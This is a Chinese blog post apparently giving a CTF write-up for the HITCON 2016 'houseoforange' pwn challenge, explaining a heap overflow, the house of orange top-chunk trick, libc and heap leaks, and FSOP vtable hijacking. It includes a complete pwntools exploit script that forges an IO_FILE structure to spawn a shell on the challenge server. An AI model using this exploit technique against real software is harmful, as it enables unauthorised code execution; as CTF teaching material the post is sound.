houseoforange_hitcon_2016

最新推荐文章于 2023-02-10 11:27:25 发布
最新推荐文章于 2023-02-10 11:27:25 发布
阅读量491 收藏
点赞数 2
分类专栏: buuctf 题目 文章标签: linux 运维 服务器 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123385071
版权

houseoforange_hitcon_2016

查看保护
在这里插入图片描述
这一题目就是使用house of orange + FSOP来解决
在这里插入图片描述
在edit的时候会让用户输入size,这里有一个堆溢出(笔者认为这一题还有一个考点就是逆清楚这个程序,自己增加结构体

在这里插入图片描述
这是笔者加的两个结构体,看成这样就行

struct Data{
Info *info;
char *name
}
struct Info{
int price;
int color;
}

加了这个之后改一下堆块的类型就可以更快的清楚这个程序的结构。
在这里插入图片描述
回归正题,在edit的时候有一个溢出,没有delete这个功能
攻击思路:1)没有delete有一个堆溢出,可以借助这个堆溢出来使用house of orange这个方法来产生一个被释放的堆块,就是改top chunk即可,这个需要4kb对齐。
2)有了堆块之后利用FSOP来劫持vtable执行system("/bin/sh");
1.首先创建一个堆块用来改top chunk。
2.改top chunk为0xfa1,0x555555606060 + 0xfa0 = 0x555555607000(4kb对齐)
在这里插入图片描述
3.创建一个超过0xfa1的堆块使得top chunk释放掉,这个时候0xfa1进入了unstorted bin。
4.利用unstorted bin泄露出Libc和heap_addr,这一步是为了下面的FSOP attack做准备
5.伪造IOfile结构将vtable改成system,这一步就是FSOP的开始。
6.伪造io file的头为/bin/sh,这样的话在malloc_printer错误的时候会调用io_overflow
_IO_OVERFLOW改为system,并且伪造结构体,开头为/bin/sh,就能获得shell了
7.想要执行io_overflow还需要fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base这个条件或者_IO_vtable_offset (fp) == 0 && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)这个条件。
具体的io的话可以看看z1r0’s blog

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 29059)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Your choice : '

def add(size, name, price, color):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Length of name :', str(size))
    r.sendafter('Name :', name)
    r.sendlineafter('Price of Orange:', str(price))
    r.sendlineafter('Color of Orange:', str(color))

def show():
    r.sendlineafter(menu, '2')

def edit(size, name, price, color):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Length of name :', str(size))
    r.sendlineafter('Name:', name)
    r.sendlineafter('Price of Orange: ', str(price))
    r.sendafter('Color of Orange: ', str(color))

add(0x10, 'aaaa', 0xff, 1)

p1 = b'a' * 0x10 + p64(0) + p64(0x21) + p64(0) * 3 + p64(0xfa1)
edit(0x50, p1, 0xff, 1)

add(0x1000, 'aaaa', 0xff, 1)
add(0x400, 'b' * 8, 0xff, 1)

show()

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 1640 - 0x10
success('malloc_hook = ' + hex(malloc_hook))
libc = ELF('libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
io_list_all = libc_base + libc.sym["_IO_list_all"]

edit(0x10, b'b' * 0x10, 0xddaa, 0xddaa)

show()
r.recvuntil('b' * 0x10)
heap_addr = u64(r.recvuntil('\n').strip().ljust(8, b'\x00'))
success('heap_addr = ' + hex(heap_addr))
one = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
one_gadget = one[1] + libc_base
system_addr = libc_base + libc.sym['system']

p1 = flat(p64(0) * 3 + p64(system_addr),
            0x400 * "\x00",
            "/bin/sh\x00", 
            0x61,
            0, 
            io_list_all - 0x10,
            0, 
            0x1,  
            0xa8 * b"\x00",
            heap_addr+0x10
            )

edit(0x600, p1, 0xddaa, 0xddaa)
r.sendlineafter("Your choice : ", "1")

r.interactive()
z1r0.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
houseoforange_hitcon_2016House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1425
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
2016-HitCon-Pwn-house_of_orange学习(附赠FSOP基础知识)
a2590035252的博客
10-25 589
[md]这里开始著名的house of orange利用方式讲解 house of orange 介绍 House of Orange 与其他的 House of XX 利用方法不同,这种利用方法来自于 Hitcon CTF 2016 中的一道同名题目。由于这种利用方法在此前的 CTF 题目中没有出现过,因此之后出现的一系列衍生题目的利用方法我们称之为 House of Orange。 概述 House of Orange 的利用比较特殊,首先需要目标漏洞是堆上的漏洞但是特殊之处在于题目中不存在 free
House Of Orange
qq_45595732的博客
11-26 1028
House Of Orange 本质:Unsorted bin attack 和 FSOP造成的组合漏洞利用方式。 House of orange源于一道题目,有时候只用到free top chunk的题目也会被归入该类中。 glibc版本<=2.23情况 特点:不需要free操作 核心原理: 1,获取unsorted bin ​ 在_int_malloc函数中,会依次检验 fastbin、small bins、unsorted bin、large bins 是否可以满足分配要求,因为尺寸问
2016 ctf-HITCON——houseoforange
04-25 394
64位程序,保护全开  #house of orange #unsorted bin attack #IO_FILE 程序逻辑 1 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) 2 { 3 signed int v3; // eax 4 5 main_init()...
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
HITCON GIRLS是一个以女性为主体的信息安全社区,致力于推广信息安全学习和提升科技行业的包容性。 【HITCON GIRLS】 HITCON GIRLS社区通过组织各种主题的读书会,鼓励女性成员深入学习信息安全知识和技术,促进...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
heap_exploit_2.31
03-21
2019 Hitcon一拳超人 tcache藏匿取消链接攻击+ 2019 Hitcon懒人房 tcache藏匿unlink攻击++ 2020 XCTF-GXZY twochunk 由空字节关闭 2019 TCTF最终版Babyheap2.29 2019 Balsn纯文字 大垃圾箱攻击 tcache dup ...
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh ...
Hitcon CTF 2016 - house of orange 做题笔记
fa1c4的blog
03-31 1117
前言 深入学习pwn的高级堆利用方法, house of orange是绕不开的难关 之前已经接触了house系列题目, 不过由于心理压迫感, 所以迟迟没有开始调试house的漏洞 现在避无可避了, 于是准备集中精力突破掉house of orange 想要打过BOSS得先升级, 但是为了升级必须先打过BOSS (雾~ 分析过程 CTFhub和BUUCTF的题目有差别, 就按BUU来打吧 漏洞利用 总结 参考 ...
House of orange
tbsqigongzi的博客
08-07 991
题目中不存在 free 函数或其他释放堆块的函数。
攻防世界 进阶 houseoforange
yongbaoii的博客
03-12 666
就是house of orange 跟题目名字一摸一样。 保护 绿油油 build 备注一写顿时简单了起来。 结构分析一下。 那orange的颜色要么就是56746,要么就是0到6. see 然后呢这里56746跟30到36输出是不一样的。 upgrade 房子只能申请三个,改也只能改三次。 对修改的大小没有限制,所以就会有堆溢出。 那问题来了,怎么利用? 他没有free函数,这就是标准的house of orange 我们总体的思路是这样的。 创建第一个house,修改top_chunk的siz
CTFHub[技能树]-----House of orange
saulgoodman的博客
02-10 206
House of orange也是我第一次学,边学边做题,来来回回折腾了8小时,代码检查了一遍又一遍,没问题但总是打不成功,最后百度查了一下这个是概率成功,我哭了。白白浪费了这么久时间。
BUUCTF-pwn(17)
njh18790816639的博客
04-17 656
happytree(SUSCTF) 分析主要函数! 主要三步操作,Insert、Delete、Show函数! 可以看到其为二叉树结构体! 因为全保护开启,故具体思路为泄露地址(heap、libc),然后利用libc2.27版本tcache的double free来修改__free_hook函数为system函数, 此时首先设置基准为0x50,此时分为两部分,左子树用来泄露heap地址并造成double free的效果,右子树来泄露libc地址并申请造成攻击效果! 首先发现可以从0x?0申请到0x?8
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 409
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
堆溢出-House of orange 学习笔记(看雪论坛)
happylzs2008的专栏
01-07 885
https://www.jianshu.com/p/4b0a73f321f9 前几天把House of orange重新学习了一下,比照着glibc malloc的源码好好分析了一下,希望做到真正做到知其然亦知其所以然,其中所做的笔记如下,可能描述上有点乱,大家将就着看一下吧。同时,我也发在了我个人博客上面 (http://blog.leanote.com/simp1e), 如果有错误的地方,...
house of orange学习报告
qq_35467337的博客
03-08 811
house of orangehouse of orange 不是什么梗,而是一道题目的名字,记录下hitcon 2016ctf house of orange
[hitcon 2017]ssrfme 1
最新发布
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值